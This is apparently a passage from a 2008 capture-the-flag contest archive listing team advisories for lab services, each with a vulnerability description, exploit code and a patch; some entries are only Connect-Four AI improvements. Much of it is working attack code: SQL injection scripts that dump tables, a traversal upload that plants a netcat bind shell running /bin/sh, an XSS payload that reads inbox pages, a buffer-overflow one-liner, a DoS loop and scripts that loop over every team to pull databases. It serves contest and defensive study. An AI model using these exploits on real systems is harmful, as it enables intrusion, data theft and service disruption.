send(SOCKET, $MSG, 0, $portaddr) == length($MSG) or die "cannot send to $HOSTNAME($PORTNO): $!";
$portaddr = recv(SOCKET, $MSG, $MAXLEN, 0) or die "recv: $!";
($portno, $ipaddr) = sockaddr_in($portaddr);
$host = gethostbyaddr($ipaddr, AF_INET);
print "$host($portno) :$MSG\
";
print "hd: ";
for $x (split '', $MSG) {
printf ("%.2X(%s) ", ord($x), $x);
}
print "\
"
}
 
sub rd {
my ($f) = @_;
snd(chr(1)."$f\\0");
}
 
sub wr {
my ($f, $s) = @_;
snd(chr(3)."$f\\0$s");
}
if (@ARGV == 1) {
wr("xxx.ps", "/fileIndex exch def
/scratch 128 string def
/i 0 def
(*) {
/filename exch def
i fileIndex eq {
filename send
quit
} if
/i i 1 add def
} scratch filenameforall
stdout (We're done here.) writestring")
} else {
rd ($ARGV[1]);
}
 
 
Patch
remove execution of ps function
 
********************* Advisory 126, teamSparta on gabble
 
Scored: 1
Submitted: 0:04:10 2.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: union...
 
Advisory
It is possible to retrieve all flags in offlinemessages with a UNION statement. The difficulty here is the check if the SQL injection parameter is already present, hence an escaped version must be added beforehand.
 
Exploit
query = "' UNION SELECT message from offlinemessages where ''='"
escquery = query.replace("'", "\\\\'")
buddy = escquery
name = rndname()
 
bsck = socket.socket()
bsck.settimeout(5.0)
bsck.connect( (address, 4000) )
bsck.send( create_packet(OPCODE_NEWUSER, [ escquery, '11.01.24.04' ]) )
bsck.close()
 
sck = socket.socket()
sck.settimeout(2.0)
sck.connect( (address, 4000) )
 
sck.send( create_packet(OPCODE_NEWUSER, [ name, '???' ] ) )
sck.recv(1024)
 
sck.send( create_packet(OPCODE_GETOFFLINE, [ query] ) )
 
 
Patch
database.c:364
 
if(strstr(query, "UNION"))
{
puts("UNION!!!");
return -1;
}
 
 
********************* Advisory 128, Flux Fingers on brook3
 
Scored: 2
Submitted: 0:08:18 2.8.2008
Published: 0:38:18 2.8.2008
 
Judge tilo said: Okay, better than the default implementation :-)
 
Advisory
Creating simple AI. Please pardon our bad Haskell skills- was the first time ;)
 
 
Exploit
Our AI first checks whether it could win by putting a coin in one of the 8 columns using the function "winner".
If it can not win, it checks whether the opponent could win with his next turn. If thats the case, it tries to prevent this by putting a coin into the first column where "winner" doesn't return "Nobody".
If none of the above is the case, the AI picks the first not full column to put the coin
 
Patch
calcNextMove :: Game -> Board -> String -> IO Int
calcNextMove game board seq = do
if isFullBoard board
then do
-- return 0 if no move is possible because the board is full
return 0
else do
-- check if oneself can win
 
if ( not ((winner (makeMove game 1 (atoi(seq)))) == Nobody))
then do
return 1
 
else do
if ( not ((winner (makeMove game 2 (atoi(seq)))) == Nobody))
then do
return 2
 
else do
if ( not ((winner (makeMove game 3 (atoi(seq)))) == Nobody))
then do
return 3
 
else do
if ( not ((winner (makeMove game 4 (atoi(seq)))) == Nobody))
then do
return 4
 
else do
if ( not ((winner (makeMove game 5 (atoi(seq)))) == Nobody))
then do
return 5
 
else do
if ( not ((winner (makeMove game 6 (atoi(seq)))) == Nobody))
then do
return 6
 
else do
if ( not ((winner (makeMove game 7 (atoi(seq)))) == Nobody))
then do
return 7
 
else do
if ( not ((winner (makeMove game 8 (atoi(seq)))) == Nobody))
then do
return 8
 
else do
-- check if opponent could win with next move
if ( not ((winner (makeMove game 1 (atoi(seq)+1))) == Nobody))
then do
return 1
 
else do
if ( not ((winner (makeMove game 2 (atoi(seq)+1))) == Nobody))
then do
return 2
 
else do
if ( not ((winner (makeMove game 3 (atoi(seq)+1))) == Nobody))
then do
return 3
 
else do
if ( not ((winner (makeMove game 4 (atoi(seq)+1))) == Nobody)) then do
return 4
 
else do
if ( not ((winner (makeMove game 5 (atoi(seq)+1))) == Nobody))
then do
return 5
 
else do
if ( not ((winner (makeMove game 6 (atoi(seq)+1))) == Nobody))
then do
return 6
 
else do
if ( not ((winner (makeMove game 7 (atoi(seq)+1))) == Nobody))
then do
return 7
 
else do
if ( not ((winner (makeMove game 8 (atoi(seq)+1))) == Nobody))
then do
return 8
 
-- if no one can win with next move, pick a different line
 
else do
if (not (isFullCol board 1))
then do
return 1
 
else do
if (not (isFullCol board 2))
then do
return 2
 
else do
if (not (isFullCol board 3))
then do
return 3
 
else do
if (not (isFullCol board 4))
then do
return 4
 
else do
if (not (isFullCol board 5))
then do
return 5
 
else do
if (not (isFullCol board 6))
then do
return 6
 
else do
if (not (isFullCol board 7))
then do
return 7
 
else do
if (not (isFullCol board 8))
then do
return 8
else do
return 0
 
********************* Advisory 130, SYPER on brook3
 
Scored: 4
Submitted: 0:12:04 2.8.2008
Published: 0:42:04 2.8.2008
 
Judge tilo said: Wow, finally somebody found this. Cool. (I think your alternative way of patching would be much easier)
 
Advisory
the function berr not valid is the seqno is numeric, then when when do the if(isNumeric seq) at line 130 of brook3.hs then function at the else branche call to bERR socket hostname game, and this function dont valid seqno and use atoi(seq).
If we send a char we will brake the server
 
The function isNum too is bad. it said x=='O' is a num. You can modify this function too.
 
Exploit
echo "localhost localhost i CLR i" | ./netcat 10.1.y.3 3333
 
this broke the server at 10.1.y.3
 
Patch
replace in the else branch the bERR function by bERR2 that not use the param seq.
 
if (isNumeric seq)
then do
-- further action depends on received packet type
case opc of
"CLR" -> bCLR socket hostname params game
"MOV" -> bMOV socket hostname params game
"OKY" -> bERR socket hostname params game
"ERR" -> bERR socket hostname params game
_ -> bERR socket hostname params game
else do
-- sequence number not numeric
bERR2 socket hostname game
else do
 
********************* Advisory 131, Squareroots on tagging
 
Scored: 2
Submitted: 0:17:18 2.8.2008
Published: 0:47:18 2.8.2008
 
Judge Lexi said: oh, this really took long to discover :)
 
Advisory
One can download the sqlite file in order to extract the filenames from the database. one can then dl the pictures. Those can then be "analysed" and submitted.
 
Exploit
for team in `seq 1 32`; do echo "retrieve ms-sql-simulation.db" | nc -w 1 -u 10.1.$team.3 5354 > db$team.db;
 
then run db.pl =>
 
 
#!/usr/bin/perl -w
use DBI;
 
my $team = shift || exit;
 
if (!-s "db".$team.".db") { exit; }
 
$dbh = DBI->connect("dbi:SQLite:dbname=db".$team.".db") || die("bla");
 
@res = $dbh->selectall_arrayref("SELECT jpeg FROM tag");
foreach (@res) {
foreach (@$_) {
foreach (@$_) {
if (!-f $_) {
system("echo 'retrieve ".$_."' | nc -w 1 -u 10.1.".$team.".3 5354 > ".$_);
if (!-s $_) { unlink($_); }
print $_."\
";
}
}
}
}
 
 
Patch
return if ($filename =~ /\\.db/);
in retrieve::init
 
********************* Advisory 132, Wizards of DoS on brook3
 
Scored: 3
Submitted: 0:18:54 2.8.2008
Published: 0:48:54 2.8.2008
 
Judge tilo said: Okay, the best solution I have seen yet.
 
Advisory
There have been 2 Ai successively in our code. The first one was rather dump and just tried to fill the columns starting with column 1. The second searches for neighbours to fill up lines,...
 
Youl find the logic in the functions
mYnextfree :: Board -> Int -> IO Int
and
mYfindneighbour :: Player -> Board -> IO Int
 
 
Exploit
see patch
 
Patch
-- | ARTIFICIAL INTELLIGENCE
-- This is a quite simple AI engine which just selects a random column. Beside increasing
-- the security of this service, it is your job to improve the AI engine to win matches.
 
calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
if isFullBoard board
then do
-- return 0 if no move is possible because the board is full
return 0
else do
-- otherwise determine a random column
mYfindneighbour player board
 
 
mYnextfree :: Board -> Int -> IO Int
mYnextfree board i
| (isFullCol board i) = (mYnextfree board (i+1))
| otherwise = return i
 
-- positively find a good place for a line
-- pity it is static in its preference
mYfindneighbour :: Player -> Board -> IO Int
mYfindneighbour player board =
return (hasneighbour (1,topOfCol board 1))
where
hasneighbour :: Point -> Int
hasneighbour (x,y)
| (x > 1) && getField board (x-1,y) == (Just player) = x
| (y > 1) && getField board (x,y-1) == (Just player) = x
| (x < cols) && getField board (x+1,y-1) == (Just player) = x
| (x > 1) && (y < 1) && getField board (x-1,y-1) == (Just player) = x
| (x < cols) && (y < 1) && getField board (x+1,y-1) == (Just player) = x
| x > cols = 4
| otherwise = hasneighbour (x+1,topOfCol board x)
 
 
********************* Advisory 133, Defender of the Flag on brook3
 
Scored: 1
Submitted: 0:23:29 2.8.2008
Published: 0:53:29 2.8.2008
 
Judge tilo said: very simple improvement
 
Advisory
The AI of brook3 is very poor... The Player chooses randomly a number to put his stones to. At this point you could code a better AI.
 
Exploit
calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
if isFullBoard board
then do
-- return 0 if no move is possible because the board is full
return 0
else do
-- otherwise determine a random column
g <- newStdGen
let randno = head (randomRs (1,cols) g::[Int]) in
if (isFullCol board randno) then do
-- calculate a new column
-- if it is full
calcNextMove player board
else do
-- otherwise return this
-- column
return randno
 
 
 
 
 
 
 
(The return randno line will be our AI)
 
Patch
calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
if isFullBoard board
then do
-- return 0 if no move is possible because the board is full
return 0
else do
-- otherwise determine a random column
g <- newStdGen
let randno = head (randomRs (1,cols) g::[Int]) in
if (isFullCol board randno) then do
-- calculate a new column
-- if it is full
calcNextMove player board
else do
-- otherwise return this
-- column
 
return 2
 
 
 
 
 
 
(We return "line 2" to the gameserver to put our stone to line 2 with every move. If the opponent puts his stones randomly, our chance to make 3 stones in a vertical row is much higher!)
 
 
********************* Advisory 136, ENOFLAG on (General Fault)
 
Scored: 2
Submitted: 0:44:12 2.8.2008
Published: 1:14:12 2.8.2008
 
Judge Lexi said: nice
 
Advisory
/home is owned by the ghoSTFTP user, ghoSTFTP is vulnerable to a directory traversal vulnerability which allows uploading files to /home by sending a file to ../.
 
The interesting thing is that (/etc/apache2/conf.d/myspray.conf) the apache configuration for the myspray service sets the PythonHome to /home.
 
<Location "/myspray">
...
PythonPath "sys.path + ['/home/'] "
...
</Location>
 
So if you upload python code to /home via the broken ghoSTFTP and request to myspray you can execute arbitrary python code.
 
Exploit
import socket, sys
 
bla=open('foo.py').read()
 
def sendWrite(s, filename, data):
data = '\\x03%s\\x00%s' % (filename, data)
s.send(data)
(d, a) = s.recvfrom(MAXLEN)
print d
 
MAXLEN=128
for i in xrange(17,18):
 
cip = '10.1.%d.35' %(i)
 
print 'connecting to %s' %(cip)
 
addr = (cip, 1025)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(addr)
except:
continue
 
sendWrite(s, '../os.py', bla)
 
 
foo.py:
#!/usr/bin/env python
import os
os.system('netcat -v -l -p 65344 -e /bin/sh')
 
 
 
Patch
<Location "/myspray">
...
PythonPath "sys.path + ['/home/'] "
...
</Location>
 
********************* Advisory 137, SYPER on gabble
 
Scored: 1
Submitted: 0:45:00 2.8.2008
Published: 1:15:00 2.8.2008
 
Judge Lexi said: ok
 
Advisory
Another buffer overflow. opcode 15
 
int dbGetAwayMessage(char* awaymessage, char* user) {
MYSQL_RES *res;
MYSQL_ROW row;
unsigned short int len = strlen(user)+65500;
int (*ptr) (char* usr);
ptr = &dbUserExists;
char query[len];
 
sprintf(query,"SELECT awaymessage FROM users WHERE name='%s'",user);
 
Exploit
./gabbler <addr> -e `perl -e 'print "x0f","a"x2000'`
 
Patch
Before sprintf :
if(strlen(user) > 60) { return 0; }
 
********************* Advisory 138, HackerDom on tagging
 
Scored: 1
Submitted: 0:48:47 2.8.2008
Published: 1:18:47 2.8.2008
 
Judge Lexi said: DoS is boring
 
Advisory
tagging is a daemon which handles commands.
 
There is a possibility of DOS attack.
 
For each command tagging tries to init module which is the first word in the command. If init was successful we try to run sub idle no matter where there is such function in module or not. In case of mickeysoft_sequel there is init but no idle. So daemon crashes.
 
Exploit
#!/usr/bin/perl
`echo mickeysoft_sequel > 1.txt`;
while(1)
{
$a='nc -u -w 1 10.1';
$b='3 5354 < 1.txt';
`$a.$_.$b` for 1..30;
 
}
 
Patch
Use "eval {}" when you try to call $foo->idle()
 
********************* Advisory 140, HackerDom on rapid graffiti
 
Scored: 5
Submitted: 0:55:21 2.8.2008
Published: 1:25:21 2.8.2008
 
Judge tilo said: WTF?? We embedded the flags with steghide!
 
Advisory
Flags in this service store as image.
Well, it's simple to write a programm which take a flag from the image.
 
Exploit
Written in C#
 
using System;
using System.Collections.Generic;
using System.Windows.Forms;
using System.Drawing;
using System.IO;
 
namespace getContent
{
static class getImage
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
 
 
 
 
 
static void Main()
{
 
string[] arguments = Environment.GetCommandLineArgs();
 
if (arguments.Length != 2)
{
System.Console.WriteLine("Usage: getImage.exe image.jpg");
Environment.Exit(1);
}
String filename = arguments[1];
Bitmap image = (Bitmap)(Image.FromFile(filename));
 
for (int i = 0; i < image.Width; i++)
{
for (int j = 0; j < image.Height; j++)
{
 
Color pixel = image.GetPixel(i, j);
if (pixel.GetBrightness() > 0.65)
{
image.SetPixel(i, j, Color.White);
}
else
image.SetPixel(i, j, Color.Black);
}
}
 
 
DirectoryInfo di = new DirectoryInfo("chars");
FileInfo[] rgFiles = di.GetFiles("*.jpg");
int lineNum = -1;
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
int newline = getStringNum(image, charImage);
if (newline == lineNum && newline != -1)
break;
if (newline != -1)
lineNum = newline;
 
}
 
 
 
//get section
 
Rectangle section = new Rectangle(0, 0, image.Width, 12);
Bitmap sectionImg = new Bitmap(section.Width, section.Height);
Graphics g = Graphics.FromImage(sectionImg);
g.DrawImage(image, 0, -lineNum);
 
 
 
 
//let's find the horisontal offset
 
 
int rowNum = -1;
int rowDist = 100000000; ;
 
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
int[] tuple = getRowNum(sectionImg, charImage);
 
if (tuple[1] < rowDist)
{
rowDist = tuple[1];
rowNum = tuple[0];
}
 
 
}
 
//get the stripe
 
 
section = new Rectangle(0, 0, 9*32, 12);
sectionImg = new Bitmap(section.Width, section.Height);
g = Graphics.FromImage(sectionImg);
g.DrawImage(image, -rowNum, -lineNum);
 
 
 
 
 
 
 
for (int i = 0; i < 32; i++)
{
int minDist = 100000;
String name = "";
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
Image singleChar = new Bitmap(10, 12);
Graphics gg = Graphics.FromImage(singleChar);
gg.DrawImage(sectionImg, -i * 9, 0);
 
int distance = getDistance(sectionImg, charImage, i*9, 0);
if (distance < minDist)
{
minDist = distance;
name = fi.Name.Substring(0, 1);
}
 
}
System.Console.Write(name);
 
 
}
 
 
 
 
 
/*
 
* generate bitmaps
*
*
Image[] chars = new Image[32];
 
for (int i = 0; i < 32; i++)
{
Image singleChar = new Bitmap(10, 12 );
Graphics gg = Graphics.FromImage(singleChar);
gg.DrawImage(sectionImg, -i*9, 0);
 
chars[i] = singleChar;
 
chars[i].Save("qqq"+(i+1)+".jpg");
}
 
 
 
 
 
 
 
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1(sectionImg));
*
*
* */
}
 
public static int[] getRowNum(Bitmap srcImg, Bitmap charImg)
{
 
 
 
int charHeight = charImg.Height;
int charWidth = charImg.Width;
 
int rowNumb = -1;
int maxDist = charWidth * charHeight;
for (int i = 0; i < srcImg.Width - (charImg.Width - 1) * 32 ; i++)
{
 
int dist = getDistance(srcImg, charImg, i, 0);
if (dist < maxDist)
{
maxDist = dist;
rowNumb = i;
}
 
}
 
int[] result = new int[2];
result[0] = rowNumb;
result[1] = maxDist;
return result;
 
}
 
 
 
 
 
public static int getStringNum(Bitmap srcImg, Bitmap charImg)
{
int srcHeight = srcImg.Height;
int charHeight = charImg.Height;
int srcWidth = srcImg.Width;
int charWidth = charImg.Width;
 
int stringMin = charWidth * charHeight;
int stringNum = -1;
 
for (int j = 0; j < srcHeight - charHeight; j++)
{
int maxDist = srcWidth * srcHeight;
for (int i=0; i < srcWidth - charWidth; i++){
 
int dist = getDistance(srcImg, charImg, i , j);
if (dist < maxDist)
maxDist = dist;
}
if (maxDist < stringMin)
{
stringMin = maxDist;
stringNum = j;
}
 
 
}
return stringNum;
 
 
}
 
public static int getDistance(Bitmap bb, Bitmap b2, int x, int y)
{
int result = 0;
for (int i = 0; i < b2.Height; i++)
{
for (int j = 0; j < b2.Width; j++)
{
result += (int)(Math.Abs((bb.GetPixel(x+j, y+i).GetBrightness() - b2.GetPixel(j, i).GetBrightness())));
}
}
return result;
}
 
 
}
}
 
Patch
Make flag text crazy :)
 
********************* Advisory 141, Defender of the Flag on gabble
 
Scored: 1
Submitted: 0:56:15 2.8.2008
Published: 1:26:15 2.8.2008
 
Judge tilo said: just a sql injection, but extensive exploit & patch
 
Advisory
The gabble service is similar to ICQ: you can add users, add buddies and change your status und set notice messages. To connect to the server you use the gabbler client. We will demonstrate how to log on without password using an SQL injection. This enables us to infringe users' privacy and steal the data related to the account.
 
Exploit
Sending the following packet for authentication allows you to bypass authentication. You will be logged on with an arbitrary user account:
 
use IO::Socket;
 
use constant TIMEOUT => 2;
$sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
PeerPort => 4000,
Proto => 'tcp', Timeout => TIMEOUT)
or die "can't connect to $ARGV[0]:$ARGV[1]: $@\
";
 
print $sock "\\x02x\\x27 or 1=1-- \\xffp\\xff"; // fake authentication
read $sock, $contents, 20;
print $sock "!(null)\\xff(null)\\xff\\x33\\xff"; // retrieve buddies (with FLAGS)
read $sock, $contents, 400000;
print "CONTENT2S: $contents"; // contains FLAGS
 
 
The opcode 2 starts logging on, the username supplied is "x' OR 1=1-- " with any password (e.g. 'p'). After that you use opcode 33 (Hex 0x21 aka "!") in order to retrieve the buddy list. After that the server sends the buddy list containing flags.
 
 
Patch
Affected is function dbIsValidPassword, cf. line 72 in database.c. Add checks to prevent SQL injection:
 
if(checkSQLString(user)!=0 || checkSQLString(password)!=0)
return 0;
 
 
Use the following validation funktion:
int checkSQLString(char* string){
char* ret;
ret=strchr(string,"'");
if (ret==NULL){
ret=strchr(string,"#");
if (ret==NULL)
ret=strchr(string,"`");
if (ret==NULL)
return 0;
}else{
return -1;
}
}
 
********************* Advisory 143, Flux Fingers on myspray
 
Scored: 2
Submitted: 0:56:38 2.8.2008
Published: 1:26:38 2.8.2008
 
Judge tilo said: xss, but extensive exploit
 
Advisory
MySpray is a clone of a well-known german social network. Every user has its own profile-page, including information about him.
By entering malicous data, an adversary would be able to steal cookies (this is new!) - since the gameserver is rendering JavaScript :)
 
 
Exploit
The following Javascript code would have to be put in some of the XSS-Enabled Formfields (see previous Advisory of us)
 
This Example performs an XMLHttpRequest and lets the Gameserver read/filter flags from Inbox (Pinboard is just a little different RegExp).
 
 
regex=/^.*([a-z0-9]{32}).*$/g;
var req = new XMLHttpRequest();
req.open('GET', 'https://10.1.<VICTIM>.3/myspray/inbox.html', true);
req.onreadystatechange = function (aEvt) { if (req.readyState == 4) { if(req.status == 200) { f=""; alert(req.responseText); alert(match[0]);for (j=0;j<match.length;j++) { f += match[j] }; alert(f); }; } };
req.send(null);
 
Patch
Like before - filter input with htmlspecialchars() in the view.py :)
 
********************* Advisory 144, HackerDom on gabble
 
Scored: 2
Submitted: 0:56:51 2.8.2008
Published: 1:26:51 2.8.2008
 
Judge tilo said: .
 
Advisory
SQL injection in query (database.c):
 
sprintf(query,"SELECT password FROM users WHERE name='%s' AND password='%s'",user,password);
 
allows to select any rows from another tables.
 
Patch filters out words 'SELECT', 'UPDATE' and 'INSERT' in TCP stream.
 
To use patch, bind your gabble server to another port (4001 in our case)
 
Exploit
#!/usr/bin/perl
 
use strict;
use Socket;
 
sub say {
 
my $buf = sprintf "%c%s\\xFF%s\\xFF", @_;
send S, $buf, 0;
sleep 1;
 
recv S, my $answ, 102400, 0;
$answ;
}
 
my $a_hex = '0123456789abcdef';
my $a_big = 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm/.';
 
my $h = shift or die "usage: gfuck.pl <ip> [port]\
";
my $p = shift || 4000;
 
socket S, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
my $a = inet_aton $h or die "inet_aton: $!, died";
connect S, sockaddr_in $p, $a or die "connect: $!, died";
 
 
# tilob99a95745bd3d7e4 | $1$b99a9574$HYoCLu5iwvvv9vqhAZ.yf/
 
my $u = genuser( );
my $p = genpass( );
 
print "u = $u, p = $p\
";
 
say 1, $u, $p;
say 2, $u, $p;
 
flags( say 22, "' UNION SELECT buddy from buddies where ''='" );
flags( say 22, "' UNION SELECT awaymessage from users where ''='" );
flags( say 22, "' UNION SELECT message from offlinemessages where ''='" );
 
sub genuser {
'tilob' . rndstr( $a_hex, 15 );
}
 
sub genpass {
'$1$' . rndstr( $a_hex, 8 ) . '$' . rndstr( $a_big, 22 );
}
 
sub rndstr {
my ( $alf, $len ) = @_;
my $r = '';
$r .= substr( $alf, int rand length $alf, 1 ) for 1 .. $len;
$r;
}
 
sub flags {
print " --- \
";
print "$_\
" for pop =~ /H([0-9a-f]{32})\\xFF/g;
}
 
 
 
Patch
#!/usr/bin/perl
 
use strict;
use Socket;
 
++$|;
 
$SIG{CHLD} = 'IGNORE';
 
my $cip; # client ip
my $dir_num = 0;
my $dir_name; # dir name for dumps (for given child process)
my $file_num = 0;
 
# ---------- config ------------
 
my $LOCAL_HOST = '0.0.0.0';
my $LOCAL_PORT = 4000;
 
my $REMOTE_HOST = '10.1.31.3';
my $REMOTE_PORT = 4001;
 
my $BUF_SZ = 1024*1024;
 
my $DUMP = 1; # 0/1 - disable/enable dumping all traffic to files
my $DUMP_DIR = 'dump';
 
my $OUT = 1; # 0/1 - disable/enable output of packets to STDERR
 
# ------- subroutines ----------
 
sub say {
my $s = sprintf shift(), @_;
my $pid = sprintf "%5d", $$;
 
print localtime() . " | ";
# print "$cip | " if $cip; # this info is contained in $dir_name
print "$dir_name | " if $dir_name;
print $s.$/;
}
 
sub save {
my $file_name = sprintf "%06d_%s", ++$file_num, shift();
 
open DMP, "> $dir_name/$file_name" or die "open: $!, died";
syswrite DMP, shift();
close DMP;
}
 
# ---------- main --------------
 
if ( $DUMP ) {
 
say "dumping enabled, dir: '$DUMP_DIR'";
 
# Create dir for dumps
 
-d $DUMP_DIR or mkdir $DUMP_DIR or die "mkdir: $!, died";
 
# Determine last dir number
 
for ( <$DUMP_DIR/*> )
{
m|/(\\d+)| or next;
$1 > $dir_num and $dir_num = $1;
}
 
$dir_num += 1;
say "dir_num will be started from %06d", $dir_num;
}
else {
say "dumping disabled";
}
 
say "remote $REMOTE_HOST:$REMOTE_PORT";
 
# L - listening socket. it will accept connections on this machine
 
socket L, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
setsockopt L, SOL_SOCKET, SO_REUSEADDR, 1 or die "setsockopt: $!, died";
my $local_pkd = inet_aton $LOCAL_HOST or die "inet_aton: $!, died";
bind L, sockaddr_in $LOCAL_PORT, $local_pkd or die "bind: $!, died";
listen L, 10 or die "listen: $!, died";
 
say "listening $LOCAL_HOST:$LOCAL_PORT";
 
while ( 1 ) {
 
my $c = accept C, L or die "accept: $!, died";
 
my ( $c_port, $c_pkd ) = sockaddr_in $c;
my $c_ip = inet_ntoa($c_pkd);
$cip = "$c_ip:$c_port";
 
if ( $DUMP ) {
 
 
mkdir ( $dir_name = sprintf "$DUMP_DIR/%06d_%s_%s", $dir_num++, $c_ip, $c_port ) or die "mkdir: $!, died";
 
open INFO, "> $dir_name/info.txt";
print INFO "client: $cip$/";
print INFO "server: $REMOTE_HOST:$REMOTE_PORT$/";
close INFO;
}
 
my $f = fork();
# $f >= 0 or die "fork: $!, died"; # uncomment on *nix
 
if ( $f == 0 )
{
close L;
say "child process started";
child_process( );
say "child process finished\
";
exit;
}
 
close C;
}
 
 
sub child_process
{
# Connecting to REMOTE_HOST : REMOTE_PORT
 
socket S, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
my $remote_pkd = inet_aton $REMOTE_HOST or die "inet_aton: $!, died";
connect S, sockaddr_in $REMOTE_PORT, $remote_pkd or die "connect: $!, died";
 
say "connected to $REMOTE_HOST:$REMOTE_PORT";
 
while ( 1 )
{
vec( my $rin, fileno(S), 1 ) = 1;
vec( $rin, fileno(C), 1 ) = 1;
 
select( $rin, undef, undef, undef );
 
if ( vec $rin, fileno(S), 1 ) # some data: S -> C
{
recv S, my $buf, $BUF_SZ, 0;
length($buf) or say "server closed connection" and last;
 
length($buf) >= 128 and print " >> NO BOF! \
" and $buf = '';
 
save 's', $buf if $DUMP;
syswrite STDERR, $buf.$/ if $OUT;
 
send C, $buf, 0;
say "S -> C (%d b)", length $buf;
}
 
if ( vec $rin, fileno(C), 1 ) # some data: S <- C
{
recv C, my $buf, $BUF_SZ, 0;
length($buf) or say "client closed connection" and last;
 
save 'c', $buf if $DUMP;
syswrite STDERR, $buf.$/ if $OUT;
 
length($buf) >= 128 and print " >> NO BOF! \
" and $buf = '';
 
if ($buf =~ /(SELECT)|(UPDATE)|(INSERT)/i){
my $hackers = "\
\
 !!!FUCKING HACKERS!!!\
\
";
syswrite STDERR, $hackers;
 
}
else{
say "S <- C (%d b)", length $buf;
send S, $buf, 0;
}
}
}
}
 
 
********************* Advisory 145, SiBears on gabble
 
Scored: 1
Submitted: 0:59:21 2.8.2008
Published: 1:29:21 2.8.2008
 
Judge tilo said: .
 
Advisory
We could try to read offline messages from user with name "' OR 'A' = 'A" (without doublequotes). Two functions: dbGetOfflineMessages() and and dbUserExists() will insert this name without filtering - both queries will be successful and will return full content of tables;
 
Exploit
this sequence of messages allows you to read contents of 'offlinemessages' table:
 
1|somename|somepass;
2|somename|somepass;
22|' OR 'A' = 'A;
 
Patch
filter all quotes ;)
Persönliche Werkzeuge